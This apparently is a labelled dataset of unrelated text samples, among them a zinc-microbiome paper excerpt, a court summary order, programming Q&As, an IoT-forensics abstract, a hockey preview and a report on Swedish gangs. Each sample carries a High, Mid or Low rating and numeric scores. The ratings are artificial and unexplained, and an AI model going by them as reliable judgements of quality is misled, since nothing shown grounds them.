\[[@B48-nutrients-07-05497]\], OTU abundance was normalized by 16S rRNA gene copy number, identified using the Greengenes database, and Kyoto Encyclopedia of Genes and Genomes (KEGG) orthologs prediction was calculated \[[@B48-nutrients-07-05497]\]. Considering dietary Zn depletion was the singular variable in our experiments, 12 of the 265 (4.5%) KEGG metabolic pathways analyzed were differentially--expressed between the Zn deficient and adequate groups ([Figure 6](#nutrients-07-05497-f006){ref-type="fig"}A,B). Non-homologous end--joining was most significantly depleted in Zn deficiency, an expected finding as Zn fingers are found in the catalytic subunit of DNA polymerase \[[@B49-nutrients-07-05497]\] and are essential for DNA binding and repair \[[@B50-nutrients-07-05497]\]. Further, we observed that even basic cecal microbiome metabolism was perturbed under Zn deficiency; pathways involving lipid metabolism, carbohydrate digestion and absorption, and, most pertinent to this study, mineral absorption were significantly depleted in the Zn(−) group. Other disruptions in microbial pathways involving the biosynthesis of bile acid and secondary metabolites, and xenobiotic detoxification reflect the fundamental requirement of dietary Zn in Zn finger motifs and in copper-zinc superoxide dismutase/glutathione enzymes, respectively. Finally, we utilized a GC-MS (Gas chromatograph--mass spectrometer) to analyze SCFA concentration in the cecal contents of the Zn(−) and Zn(+) birds ([Figure 7](#nutrients-07-05497-f007){ref-type="fig"}). SCFAs are produced by bacterial fermentation and serve as a primary metabolic substrate for colonocytes \[[@B51-nutrients-07-05497]\]. We observed a significant decrease in the concentration of acetate (C~2~) and hexanoate (C~6~) in Zn(−) cecal contents. Pertinent to our results, SCFAs may increase dietary Zn absorption via a decrease in luminal pH in the intestines \[[@B52-nutrients-07-05497]\], thereby increasing Zn solubility, and/or via stimulation of the proliferation of intestinal epithelial cells leading to an increase in the overall absorptive area of the intestines \[[@B53-nutrients-07-05497]\]. In this study, a decrease in SCFA concentration in the Zn(−) group may have followed from either the observed bacterial composition shifts and/or the decreased output of carbohydrate metabolism and fermentation via changes in microbial metabolic pathways. In the host, this may initiate a continuous cycle, which serves to limit Zn uptake even in an already Zn deficient state. {#nutrients-07-05497-f006} {#nutrients-07-05497-f007} 4. Discussion {#sec4-nutrients-07-05497} ============= The gut microbial ecology is known to play a prominent role in host nutritional status, through mechanisms such as modulating saccharide cellular uptake \[[@B54-nutrients-07-05497]\], influencing energy balance \[[@B46-nutrients-07-05497]\], and *de novo* biosynthesis of particular vitamins and minerals \[[@B55-nutrients-07-05497]\]. The gut, which houses the majority of these microbes, is an important organ in the absorption of Zn from the diet \[[@B56-nutrients-07-05497],[@B57-nutrients-07-05497],[@B58-nutrients-07-05497]\]. Insufficient and/or poorly bioavailable dietary Zn intake are the primary etiological risk factors of Zn deficiency \[[@B59-nutrients-07-05497],[@B60-nutrients-07-05497],[@B61-nutrients-07-05497]\]. However, to our knowledge, the significance, if any, of compositional and/or functional changes in the gut microbiome during dietary Zn depletion has yet to be explored. As is the case in humans and the vast majority of animals, *Gallus gallus* harbors a complex and dynamic gut microbiota \[[@B62-nutrients-07-05497]\], heavily influenced by host genetics, environment, and diet \[[@B63-nutrients-07-05497]\]. There is considerable similarity at the phylum level between the gut microbiota of broilers (*Gallus gallus*) and humans, with Bacteroidetes, Firmicutes, Proteobacteria, and Actinobacteria representing the four dominant bacterial phyla in both \[[@B54-nutrients-07-05497],[@B64-nutrients-07-05497]\]. Due to its rapid maturation and well--characterized phenotype during mineral deficiency, *Gallus gallus* has been used extensively as a model of human nutrition, especially as it pertains to assessing physiological outcomes of low dietary Fe and Zn \[[@B65-nutrients-07-05497],[@B66-nutrients-07-05497],[@B67-nutrients-07-05497],[@B68-nutrients-07-05497],[@B69-nutrients-07-05497],[@B70-nutrients-07-05497],[@B71-nutrients-07-05497],[@B72-nutrients-07-05497]\]. Therefore, a central aim of the present study was to use *Gallus gallus* as a model to characterize cecal bacterial community changes between Zn deficient and Zn replete groups. Our data demonstrate that in chronic Zn deficiency, species richness, as measured by the Chao1 index, and species diversity, as measured by the total observed OTUs, were both significantly decreased. Conversely, a significant increase in UniFrac distances was observed in the Zn deficient group, signifying the looser community relatedness of the cecal microbiomes of Zn deficient animals compared with their Zn replete counterparts. Since Zn is an essential mineral for many bacteria \[[@B73-nutrients-07-05497]\], we suggest that a Zn--depleted environment might lead to a less diverse community, preferentially composed of bacterial species that are viable under Zn--limiting conditions. These alterations in cecal microbiota diversity indices mirror those found in a range of GI \[[@B37-nutrients-07-05497],[@B38-nutrients-07-05497]\] and non-GI disease states \[[@B39-nutrients-07-05497],[@B40-nutrients-07-05497],[@B41-nutrients-07-05497],[@B42-nutrients-07-05497],[@B74-nutrients-07-05497]\]. A similar dysbiotic profile has also been observed in the microbiota of micronutrient--deficient, malnourished children \[[@B75-nutrients-07-05497],[@B76-nutrients-07-05497]\]. This pattern may exemplify the striking effect of suboptimal dietary Zn intake, as with other essential micronutrients, on bacterial diversity. Therefore, loss of global diversity of the cecal microbiota during Zn deficiency may be an important, yet non-specific, indicator of suboptimal Zn intake. Resident microbes of the gut microbiome compete with their host for various vitamins and transition elements \[[@B16-nutrients-07-05497],[@B77-nutrients-07-05497],[@B78-nutrients-07-05497],[@B79-nutrients-07-05497]\], such as Fe and Zn. Particularly important, Zn ions are involved in numerous structural and catalytic proteins in most organisms, with Zn-binding proteins constituting 10% of the human proteome and nearly 5% of the bacterial proteome \[[@B80-nutrients-07-05497],[@B81-nutrients-07-05497]\]. One form of host--microbe competition occurs through the encoding of bacterial transporters, such as the high--affinity Zn transporter, ZnuABC, in the bacterial genome, representing the essential nature of Zn for bacterial viability \[[@B77-nutrients-07-05497]\]. In our study, the compositional alterations in the Zn deficient group, most notably the significant expansion of the phylum Proteobacteria, as well as the genera *Enterobacteriaceae* and *Enterococcus*, may help to explain how dietary Zn and the microbiota interact, since the ZnuABC transporter has been found to be induced in many species within these bacterial groups under Zn-limiting conditions \[[@B82-nutrients-07-05497],[@B83-nutrients-07-05497]\]. Lack of sufficient bioavailable dietary Zn in the lumen, therefore, may modulate the gut microbiota by enabling colonization and outgrowth of bacteria that can efficiently compete for Zn. Further, we postulate that microbe-microbe interactions through a decrease in the preponderance of members of the Firmicutes phylum such as the genus *Clostridium*, known SCFA producers, may explain the overgrowth of these bacteria in the Zn(−) group \[[@B84-nutrients-07-05497]\]. SCFAs have been shown to inhibit the growth of certain Proteobacteria such as members of the *Enterobacteriaceae* *in vivo* \[[@B84-nutrients-07-05497],[@B85-nutrients-07-05497],[@B86-nutrients-07-05497]\], and thus a decrease in SCFA concentration may further explain the cecal compositional shift observed during Zn deficiency. Additionally, alterations in the luminal environment of the intestines, such as a reduction in pH through increased SCFA production, can result in a notable increase in Zn bioavailability and uptake \[[@B57-nutrients-07-05497],[@B87-nutrients-07-05497]\]. Therefore, our data suggest that changes in the gut microbiota composition of the Zn deficient group can further deplete Zn availability in an already Zn deficient state. Although we expected to observe a conservation of endogenous Zn through compensatory mechanisms in the Zn(−) group, upregulation of the expression of brush--border membrane proteins responsible for Zn uptake (*i.e.*, the ZnT and ZIP family transmembrane proteins) were not observed in the Zn(−) group \[[@B12-nutrients-07-05497]\]. Thus, our results suggest that the host-microbe balance may tilt in favor of the resident cecal microbiota (*i.e.,* the sequestration of Zn by the microbiota) during chronic Zn deficiency. As opposed to the competition--based mechanism underlying how altered Zn availability may structurally change the gut microbiota, a compensation-based mechanism may explain the metagenomic differences between the two groups. In the Zn deficient group, depletion of a key KEGG pathway, the mineral absorption pathway, was observed. The interplay between inadequate host Zn availability and commensal gut microbes may be implicated in the compensation for the relative lack of dietary Zn in the Zn(−) group; accordingly, this might lead to a depletion in bacterial pathways responsible for Zn uptake, and an enrichment in host mineral absorption pathways for the purpose of improving systemic Zn status. Additionally, lack of Zn available to the bacteria might also cause a decrease in bacterial Zn accumulation. Another aim of our study was to identify correlations between candidate microbes and commonly-used biological indicators of Zn deficiency ([Figure 5](#nutrients-07-05497-f005){ref-type="fig"}C). *Clostridium indolis,* a microbe we found to be negatively correlated with bodyweight and Zn adequacy, has been isolated from clinical samples of both animal and human infections \[[@B88-nutrients-07-05497]\], and may have the potential to produce beneficial SCFAs such as acetate and butyrate \[[@B89-nutrients-07-05497]\]. *Enterococcus* sp. was positively correlated with final body weight, serum Zn, and Zn adequacy. Members of this genus, specifically *Enterococcus faecium,* have been shown previously to correlate with increased bodyweight \[[@B90-nutrients-07-05497]\] and elevated serum Fe levels \[[@B91-nutrients-07-05497]\]. The presence of *Clostridium lactatifermentans*, a SCFA producer, positively correlated with bodyweight, serum Zn, and Zn adequacy. It has been isolated previously from *Gallus gallus,* and associated with an improvement in growth and development (as defined by bodyweight) \[[@B92-nutrients-07-05497]\]. Aside from these studies, there are little data linking any of these microbes with a purported influence of host Zn status or overall physiology. Future research using GF animals may elucidate new roles for these specific microbes in the etiology and/or progression of Zn deficiency. 5. Conclusions {#sec5-nutrients-07-05497} ============== We have revealed a dramatic compositional and functional remodeling that occurs in the *Gallus gallus* gut microbiota under chronic Zn deficient conditions. Compositional alterations in bacterial abundance, in part due to host--microbe and microbe--microbe interactions, lead to changes in the functional capacity of the microbiota, such as SCFA output, which can influence the absorption and availability of dietary Zn by the host. Our data suggest that as a consequence of this remodeling, a Zn (--) microbiota has the potential to perpetuate, and perhaps even aggravate, the Zn deficient condition through the further sequestration of Zn from the host ([Figure 8](#nutrients-07-05497-f008){ref-type="fig"}). Such a microbiota are not functionally compatible with the physiological needs of the Zn deficient host. In addition, others have observed decreased luminal Zn solubility in the intestines \[[@B87-nutrients-07-05497]\], increased GI inflammation and intestinal permeability, and an overall decline in GI health \[[@B93-nutrients-07-05497],[@B94-nutrients-07-05497]\] under Zn deficiency. Our findings add to this knowledge by suggesting possible mechanisms by which the gut microbiota may contribute to host Zn deficiency. Further research should determine whether the gut microbiome could represent a modifiable risk factor for chronic Zn deficiency. ![Schematic diagram depicting proposed mechanisms by which a Zn deficient gut microbiome may worsen a Zn deficient phenotype. Zn deficiency (1), caused by insufficient dietary Zn (2), induces a decrease in gut microbial diversity (3), and an outgrowth of bacteria particularly suited to low Zn conditions, leading to dysbiosis \[3A--C\]. Lack of dietary Zn also leads to alterations in the functional capacity of the microflora (4), causing multiple effects including decreased expression of pathways related to mineral (*i.e.*, Zn) absorption (4A) and carbohydrate digestion and fermentation (4B). A decrease in the latter pathway may also cause a depression in the production of SCFAs (5), compounds responsible for improving the bioavailability of Zn. Altogether, these microbial effects may decrease Zn absorbability (6A, \[[@B87-nutrients-07-05497]\]) and disturb GI health (6B, \[[@B93-nutrients-07-05497],[@B94-nutrients-07-05497]\]), thereby perpetuating a Zn deficient state. Red arrows and orange--lined boxes denote observations of this study, and dashed arrows and black--lined boxes describe published findings.](nutrients-07-05497-g008){#nutrients-07-05497-f008} ###### Click here for additional data file. The following are available online at <http://www.mdpi.com/2072-6643/7/12/5497/s1>, Table S1: Composition of the experimental diets, Table S2: Measured genes (*Gallus gallus*) and tissue-specific 18S rRNA from mRNA. SR, OK, and ET designed the research protocol; SR, HN, SM, RPG, OK, and ET collected/ analyzed the data; SR and ET wrote the paper and had primary responsibility for final content; ET is the primary investigator that has led the research conducted and presented in this manuscript. All authors read and approved the final manuscript. The authors declare no conflict of interest. | Mid | [
0.622739018087855,
30.125,
18.25
] |
12-1369-cv Llanos v. Brookdale Univ. Hosp. & Med. Ctr. UNITED STATES COURT OF APPEALS FOR THE SECOND CIRCUIT SUMMARY ORDER RULINGS BY SUMMARY ORDER DO NOT HAVE PRECEDENTIAL EFFECT. CITATION TO A SUMMARY ORDER FILED ON OR AFTER JANUARY 1, 2007 IS PERMITTED AND IS GOVERNED BY FEDERAL RULE OF APPELLATE PROCEDURE 32.1 AND THIS COURT’S LOCAL RULE 32.1.1. WHEN CITING A SUMMARY ORDER IN A DOCUMENT FILED WITH THIS COURT, A PARTY MUST CITE EITHER THE FEDERAL APPENDIX OR AN ELECTRONIC DATABASE (WITH THE NOTATION "SUMMARY ORDER"). A PARTY CITING A SUMMARY ORDER MUST SERVE A COPY OF IT ON ANY PARTY NOT REPRESENTED BY COUNSEL. At a stated term of the United States Court of Appeals for the Second Circuit, held at the Thurgood Marshall United States Courthouse, 40 Foley Square, in the City of New York, on the 28th day of February, two thousand thirteen. PRESENT: DENNY CHIN, CHRISTOPHER F. DRONEY, Circuit Judges, JANE A. RESTANI,* Judge. - - - - - - - - - - - - - - - - - - - -x RICARDO LLANOS, Plaintiff-Appellant, -v- 12-1369-cv THE BROOKDALE UNIVERSITY HOSPITAL AND MEDICAL CENTER, SODEXHO MARRIOT HEALTH CARE SERVICES, SERVICE EMPLOYEES INTERNATIONAL UNION LOCAL 1199 AFL-CIO, Defendants-Appellees. - - - - - - - - - - - - - - - - - - - -x FOR PLAINTIFF-APPELLANT: Regina Felton, Felton & Associates, Brooklyn, New York. FOR DEFENDANT-APPELLEE Arjay G. Yao, Steven M. Berlin, BROOKDALE UNIVERSITY Martin Clearwater & Bell LLP, New HOSPITAL AND MEDICAL York, New York. CENTER: FOR DEFENDANT-APPELLEE Stanley L. Goodman, Donia F. SODEXHO MARRIOT HEALTH Sawwan, Fox Rothschild LLP, New CARE SERVICES: York, New York. * The Honorable Jane A. Restani, of the United States Court of International Trade, sitting by designation. FOR DEFENDANT-APPELLEE Richard Dorn, Levy Ratner, P.C., SERVICE EMPLOYEES New York, New York. INTERNATIONAL UNION LOCAL 1199 AFL-CIO: Appeal from the United States District Court for the Eastern District of New York (Irizarry, J.). UPON DUE CONSIDERATION, IT IS HEREBY ORDERED, ADJUDGED, AND DECREED that the judgment of the district court is AFFIRMED. Plaintiff-appellant Ricardo Llanos appeals from a judgment entered March 14, 2012, dismissing his amended complaint for failure to state a claim. In a memorandum and order filed March 11, 2012, the district court dismissed Llanos's claims that (1) he was wrongfully discharged by defendant-appellee Brookdale University Hospital and Medical Center ("Brookdale"), in violation of the collective bargaining agreement (the "CBA"); (2) defendant-appellee Service Employees International Union Local 1199 AFL-CIO ("Local 1199") breached its duty of fair representation by failing to properly represent him in the grievance process; and (3) his civil rights were violated. On appeal, Llanos argues that the district court erred in dismissing his claims. We assume the parties' familiarity with the facts, procedural history, and specification of issues for review. On appeal from a dismissal pursuant to Federal Rule of Civil Procedure 12(b)(6), we review de novo whether the complaint "'contain[s] sufficient factual matter, accepted as true, to state a claim to relief that is plausible on its face.'" Gibbons v. Malone, 703 F.3d 595, 599 (2d Cir. 2013) (quoting Ashcroft v. Iqbal, 556 U.S. 662, 678 (2009)). - 2 - First, Llanos has failed to plausibly plead that Brookdale breached the CBA.1 Even assuming the CBA prohibited Brookdale from delegating its discretion to fire employees for cause to defendant-appellee Sodexho Marriot Health Care Services ("Sodexho") -- a point on which the CBA is silent -- Brookdale implicitly ratified Sodexho's decision, retroactively making the decision to terminate its own. See Hamm v. United States, 483 F.3d 135, 140 (2d Cir. 2007) ("'Ratification is the affirmance by a person of a prior act which did not bind him . . . whereby the act, as to some or all persons, is given effect as if originally authorized by him.'" (quoting Restatement (Second) of Agency § 82 (1958))). While Llanos alleges that Sodexho employee Peter Ortiz falsely accused him of urinating in public, he does not allege that such conduct would be insufficient "cause" for termination, nor does he allege that Local 1199 failed to contest Ortiz's factual allegations in the grievance proceedings. He only alleges that Local 1199 failed to raise the legal argument that Ortiz, as a Sodexho employee, could not exercise Brookdale's authority to fire him. Thus, the only plausible inference is 1 Because Llanos did not exhaust all of the grievance and arbitration remedies available to him in the CBA, he actually pled his claim as a "hybrid" claim -- alleging both Brookdale's violation of the CBA, in violation of the Labor Management Relations Act § 301, 29 U.S.C. § 185, and the union's breach of its duty of fair representation, in violation of the National Labor Relations Act § 9(a), 29 U.S.C. § 159(a). See DelCostello v. Int'l Bhd. of Teamsters, 462 U.S. 151, 164 (1983); White v. White Rose Food, 237 F.3d 174, 178-79 & n.3 (2d Cir. 2001). Because, as explained below, both of the underlying claims fail on their own merits, the hybrid claim also fails. See DelCostello, 462 U.S. at 164 ("[T]he two claims are inextricably interdependent." (citation and internal quotation marks omitted)). - 3 - that Local 1199 did contest Ortiz's allegations in the grievance proceedings and both appeals boards found them to be credible. Second, Llanos's complaint does not plausibly plead a claim for breach of Local 1199's duty of fair representation. To prove a breach of the duty of fair representation, the plaintiff must show that (1) the union engaged in arbitrary, discriminatory, or bad faith conduct, and (2) the conduct caused plaintiff's injuries. See White v. White Rose Food, 237 F.3d 174, 179 (2d Cir. 2001). "A union's actions are arbitrary only if, in light of the factual and legal landscape at the time of the union's actions, the union's behavior is so far outside a 'wide range of reasonableness,' as to be irrational." Id. (internal quotation marks, citation, and alteration omitted). "A showing of bad faith requires a showing of fraudulent, deceitful, or dishonest action." Id. (internal quotation marks, citation, and alteration omitted). Because the complaint does not plausibly allege a breach of the CBA, we conclude that the complaint also fails to allege that Local 1199 acted arbitrarily or in bad faith by declining to pursue a meritless legal argument. Finally, Llanos raised an unspecified civil rights claim in his amended complaint, and he appears to argue, for the first time on appeal, that this was an age discrimination claim. This argument is waived because it was never raised before the district court. See In re Nortel Networks Corp. Secs. Litig., 539 F.3d 129, 132 (2d Cir. 2008) (per curiam). Even if we were to consider it, this claim would fail on the merits because the - 4 - complaint fails to plead any facts giving rise to a plausible inference of discrimination. We have considered Llanos's remaining arguments and find them to be without merit. Accordingly, we AFFIRM the judgment of the district court. FOR THE COURT: Catherine O'Hagan Wolfe, Clerk - 5 - | Low | [
0.47505938242280205,
25,
27.625
] |
Radiobiology of radiosurgery for refractory anxiety disorders. The neuroradiological manifestations of bilateral single-session gamma (gamma)-irradiation to normal tissue contained in the internal capsule after gamma knife capsulotomy for otherwise intractable anxiety disorders were studied. In nine consecutive patients, a target maximum dose of 200 Gy was administered in a target volume of 276 +/- 42 mm3 (mean +/- SD) within the 50% isodose level. Serial computed tomographic and magnetic resonance imaging scans were undertaken from 3 to 44 months after irradiation. After surgery, a necrotic lesion appeared on computed tomographic scans, reaching its maximum volume (900 +/- 800 mm3) at 6 to 9 months, then decreasing (to 457 +/- 400 mm3) over the first postoperative year. This volume correlated with the mean isodose level of 91 (range, 41-143) Gy. On T2-weighted magnetic resonance imaging scans, the reaction tissue volumes were considerably larger and took longer to disappear than expected. In 15 targets, maximum reaction volumes were recorded at 1 to (approximately) 2 years after irradiation. In the remaining seven targets, smaller reaction volumes were observed, with no clear maxima appearing during 3 years of observation. In a pilot case, a lower target maximum dose of 160 Gy and a radiation volume of 275 mm3 within the 50% isodose gave only minimal surrounding tissue reactions. This report serves to alert clinicians that the tissue reaction volumes and the time course of their development after high irradiation doses may be less predictable than expected from previous observations in smaller radiation volumes. For this reason, lower irradiation doses and smaller volumes should be used in the future, and the time factor should be taken into account when interpreting computed tomographic and magnetic resonance images of gamma-knife-induced lesions. | High | [
0.671717171717171,
33.25,
16.25
] |
Q: iOS MKMapView issues I have a MKMapView displaying some custom locations . Everything works fine until I press the go back button . SearchViewController is my class name. Sometimes I get : [SearchViewController respondsToSelector:]: message sent to deallocated instance 0x73495f0 Other times : [SearchViewController mapView:regionDidChangeAnimated:]: message sent to deallocated instance 0x7343f20 Or : [SearchViewController mapView:didUpdateUserLocation:]: message sent to deallocated instance 0x7343f20 These functions are : -(void)mapView:(MKMapView *)mapView didUpdateUserLocation:(MKUserLocation *)userLocation { MKCoordinateRegion mapRegion; mapRegion.center = mapViewHandler.userLocation.coordinate; mapRegion.span.latitudeDelta = 0.2; mapRegion.span.longitudeDelta = 0.2; [mapViewHandler setRegion:mapRegion animated: YES]; } - (void)mapView:(MKMapView *)mapView didDeselectAnnotationView:(MKAnnotationView *)view { //do nothing } This usually happens when I get into the view and then right back out. Could you help me get rid of this bug ? I have the mapViewHandler created in the .xib file , and used [self.mapViewHandler setDelegate:self]; in viewDidLoad() method. Is there a way to stop everything from loading(requests,etc.) when I press the go back button and leave this view ? A: When you "go back", your SearchViewController is being pulled off of the navigation stack and is getting deallocated. However, the MKMapView is still active and is trying to invoke delegate methods on your view controller which no longer exists. Try setting the mapView delegate to nil in your view controller dealloc or viewDidUnload method. | High | [
0.6578947368421051,
31.25,
16.25
] |
Declarative versus episodic: two theories put to the test. The question of whether the hippocampus plays a selective role in episodic memory or a more general role in both episodic and semantic memory (together termed declarative memory) is an unresolved and much-debated topic in the current literature. In two back-to-back articles in this issue of Neuron, Squire and his colleagues describe findings from a group of six patients with damage thought to be limited to the hippocampus. The reported findings provide new evidence toward resolving this much-debated controversy. | High | [
0.701472556894243,
32.75,
13.9375
] |
Q: What is the purpose of unannotated arguments in Spring controller handler methods? Suppose I have a POST handler method: @PostMapping("/group/{id}") public OutParameters findRealTimeOrder(@RequestParam String anyParam, @RequestBody String payload, @PathVariable("id") String groupId, InParameters parameters) { return service.process(parameters); } All annotations here have descriptive documentation so I know what is their purpose, but I have no idea what is the last parameter for. How it is related to the request? A: from spring doc: If a method argument is not matched to any of the above, by default it is resolved as an @RequestParam if it is a simple type, as determined by BeanUtils#isSimpleProperty, or as an @ModelAttribute otherwise. | Mid | [
0.586021505376344,
27.25,
19.25
] |
IoT-Forensics is a novel paradigm for the acquisition of electronic evidence whose operation is conditioned by the peculiarities of the Internet of Things (IoT) context. As a branch of computer forensics, this discipline respects the most basic forensic principles of preservation, traceability, documentation, and authorization. The digital witness approach also promotes such principles in the context of the IoT while allowing personal devices to cooperate in digital investigations by voluntarily providing electronic evidence to the authorities. However, this solution is highly dependent on the willingness of citizens to collaborate and they may be reluctant to do so if the sensitive information within their personal devices is not sufficiently protected when shared with the investigators. In this paper, we provide the digital witness approach with a methodology that enables citizens to share their data with some privacy guarantees. We apply the PRoFIT methodology, originally defined for IoT-Forensics environments, to the digital witness approach in order to unleash its full potential. Finally, we show the feasibility of a PRoFIT-compliant digital witness with two use cases. | High | [
0.6836734693877551,
33.5,
15.5
] |
Preview: IceRays vs. Lone Star Brahmas (Game 22) Rays Make it Five The IceRays have now strung together the most consecutive wins since their record-breaking seven-game stretch last season. Oddly enough, in two straight games now, the IceRays have opened the scoring on their first registered shot on goal. Drawing first blood proved to be consequential last night, as the Rays were able to build on their momentum and add a couple more goals to pad their lead, which ultimately sustained them throughout the rest of the night. Lone Star is a team that is far more effective at playing with a lead than they are when trying to muster a comeback, so scoring first is always paramount against them. However, they gave the Rays all they could handle last night and came 2/3 of the way from completing the comeback. The Corpus Christi zone was under siege virtually the entire second half of the game. Playing a full 60 minutes will be critical in game two, with fatigue, frustrations and hostilities all sure to play a bigger factor tonight. The Matchup The first head-to-head matchup this season was almost a reversed version of last night’s contest. Back on October 20th, the Brahmas scored three early goals, the IceRays tallied twice in a concerted effort to tie the game, and eventually had their hopes dashed by an empty-net goal. Jumping out to such an early lead against either one of these teams can be dangerous; it’s been proven several times this season that they are both more than capable of rallying and chipping away at substantial deficits. Tonight, the Brahmas are playing their last road game before embarking on a ten-game home stand. They’ve just had their three-game winning streak snapped, and also just conceded the first-place spot to the Shreveport Mudbugs. There is no question their resolve will be strong tonight, and there’s also little doubt the IceRays will be squaring off against the second best goaltender in the NAHL at the moment. Mitchell Gibson, well-rested, has won seven of his last eight starts. The Rays will have their work cut out for them. November Dominance November has been a month to remember for the IceRays. Having won every tilt in the month so far, they’re now just two wins away from tying a junior franchise record. Last season, once February hit, the IceRays showed how unstoppable they could be when they started rolling. Winning seven straight back in February launched the IceRays from being a bubble team to one that was competing for home ice advantage in the first round of the playoffs. This season, taking five straight has instantly brought the Rays back into the South Division picture. They are now tied for fourth place with the Odessa Jackalopes, a team they were eight points behind when November began. With help from Shreveport and Topeka, the IceRays can jump into third place tonight and instantly capture the attention of the rest of the division, if they haven’t done so already. Jungwirth Does it Again Back-to-back South Division First Star of the Week performances. Nine goals and eleven points over his last five games. A pair of highlight-reel goals yesterday, including the eventual game-winner. Larry Jungwirth has simply been on another level. He seems to create something every time he has the puck on his stick. His silky-smooth hands and craftiness in tight quarters make him a constant threat, and as of late, he’s finished off almost every chance he’s given himself. At the start of the season, he had as many scoring opportunities as anyone, but struggled to convert on many of them. Now, when he has the puck somewhere near the net, one can almost assume it’s going in. | Mid | [
0.6394230769230761,
33.25,
18.75
] |
Translate Subscribe To Reader Info Reader uninitiated in blogs, the title of each post usually links to an original article from another source, be it newspaper or journal. Then text of the post consists of the posters comments and the comment button is for you to refer us to other interesting information or just to make a comment. GUN CRIME GANGLAND USERS GANGLAND IS A SOCIAL ENTERPRISE PROJECT Gangland was started ten years ago as a methods of tracking and reporting the social growth of gangs worldwide.It is based on factual reporting from journalists worldwide.Research gleaned from Gangland is used to better understand the problems surrounding the unprecedented growth during this period and societies response threw the courts and social inititives. Gangland is owner and run by qualified sociologists and takes no sides within the debate of the rights and wrongs of GANG CULTURE but is purely an observer.GANGLAND has over a million viewers worldwide.Please note by clicking on "Post Comment" you acknowledge that you have read the Terms of Service and the comment you are posting is in compliance with such terms. Be polite. PROFANITY,RACIST COMMENT Inappropriate posts may be removed by the moderator. Send us your feedback Comments Comments:This is your opportunity to speak out about the story you just read. We encourage all readers to participate in this forum.Please follow our guidelines and do not post:Potentially libelous statements or damaging innuendo, such as accusing somebody of a crime, defaming someone's character, or making statements that can harm somebody's reputation.Obscene, explicit, or racist language.Personal attacks, insults, threats, harassment, or posting comments that incite violence.Comments using another person's real name to disguise your identity.Commercial product promotions.Comments unrelated to the story.Links to other Web sites.While we do not edit comments, we do reserve the right to remove comments that violate our code of conduct.If you feel someone has violated our posting guidelines please contact us immediately so we can remove the post. We appreciate your help in regulating our online community. Read more: http://royalespot.blogspot.com/#ixzz0cg4WCuMS Prosecutor Barbro Joensson was driving to work when a bomb exploded at the front door of her house, rocking her whole neighbourhood and sending shockwaves through traditionally serene Sweden."It is very hard to describe how I felt when I heard what happened. I think I still haven't grasped how serious it was," Joensson, 53, told AFP more than a year after the attack.She was prosecuting a high-profile case against a violent criminal gang called the Wolfpack Brotherhood and had just left her home in the southwestern town of Trollhaettan on November 20, 2007, when the blast ripped off the front door and shattered the hallway.Two young gang members were remanded in custody just over a month ago on suspicion they planted the bomb, which could have killed Joensson had she been at home.The bombing -- one of the first overt attacks on a Swedish prosecutor -- prompted calls to root out the swelling criminal gangs that have smashed the Scandinavian country's tranquil image.The gangs have caused a spike in a number of crimes, including extortion and loan-sharking -- a gang specialty -- which have jumped from 740 cases reported in 2003 to 1,715 last year, according to preliminary statistics from the Swedish National Council for Crime Prevention.Police say it is difficult to estimate the number and size of criminal gangs in Sweden since membership can vary from day to day, but media reports indicate around 1,000 people are actively involved in at least six large criminal gangs with numerous branches across the country.Gangs make headlines almost daily with stories of drug busts, brutal attacks on business owners unable to pay off debts and bloody gang wars."This is a serious problem that has grown in recent years," Swedish Justice Minister Beatrice Ask told AFP."We used to be fairly sheltered in the Nordic countries, but unfortunately this problem has surfaced and we must react very forcefully now or else this could be extremely serious in say 10 years," she cautioned.Police also think that attacks like the one on Joensson constitute a novel and dangerous twist in Swedish gang activity."Attacks on the judiciary are a rather new and very serious phenomenon," said Klas Friberg, the police chief in the Vaestra Goetaland region that comprises Trollhaettan and Gothenburg.Joensson, who moved after the attack on her home and joined a police unit in Gothenburg working to fight gang crime, agreed."We risk having judges who don't dare to judge, prosecutors who are afraid to prosecute and police who refrain from making arrests," she said, adding that "if that happens the first bastion against these groups will fall." Just four months after the Trollhaettan bombing, shots were fired at the home of another prosecutor in the region, Mats Mattsson, who had worked extensively on cases involving criminal motorcycle gangs like Bandidos. While no one was hurt in that attack either, it prompted more calls for action and sent the government and police scurrying to come up with new measures to combat the scourge.Special police and intelligence units were created along with a "Knowledge Centre" on gang activity as part of a national strategy aimed at cracking down on gangs and blocking recruitment of new members."Local police have to be on their case all the time, making it uncomfortable for anyone who has not yet been fully recruited to hang around these people," said Justice's Ask. Despite heightened police efforts, around 10 new clubhouses belonging to gangs like Hells Angels, Bandidos, Wolfpack Brotherhood and Original Gangsters reportedly sprouted up across Sweden last year alone. The highest concentration of gang units is centred around the southern towns of Malmoe and Gothenburg, largely due to their proximity to Denmark, where the gangs also constitute a major problem. "A few years ago, Denmark carried out very forceful measures against these gangs and a number of these people moved over to Sweden. Now, we hope they will move back, or rather further," Ask said. Erik Lannerbaeck, a former member of several gangs including the Wolfpack Brotherhood and Bandidos, meanwhile told AFP that simply cracking down on the gangs would accomplish little. "The main focus should be on getting members to leave the gangs, and to do that you can't just lock people up and hope they'll be better when they get out," said Lannerbaeck, who after a decade in criminal gangs began working as a counselor for troubled youths in Stockholm in 2004. Gang members trying to get out often need protection and help paying off debts and finding a job, but most of all "they need support from people who understand them and can help them see the value in being normal, and to create a new identity," he insisted. Lannerbaeck said he himself repeatedly tried to leave his life of crime only to be drawn back in by the promise of wads of cash or the desire to once again be feared and respected instead of stepped upon in a menial job. "It was like a drug," he said, adding that landing a good job where he was appreciated was what made it possible to get out for good. "It is very important that people can leave," Ask agreed, adding that a project to help people get out of the gangs would likely be funded soon. "Huge efforts are needed and we need a lot of people to push in the same direction, but I think we can bring this problem under control," she said. You Might Also Like : 0 comments: LinkWithin Disclaimer: The statements and articles listed here, and any opinions, are those of the writers alone, and neither are opinions of nor reflect the views of this Blog. Aggregated content created by others is the sole responsibility of the writers and its accuracy and completeness are not endorsed or guaranteed. This goes for all those links, too: Blogs have no control over the information you access via such links, does not endorse that information, cannot guarantee the accuracy of the information provided or any analysis based thereon, and shall not be responsible for it or for the consequences of your use of that information. | Low | [
0.525210084033613,
31.25,
28.25
] |
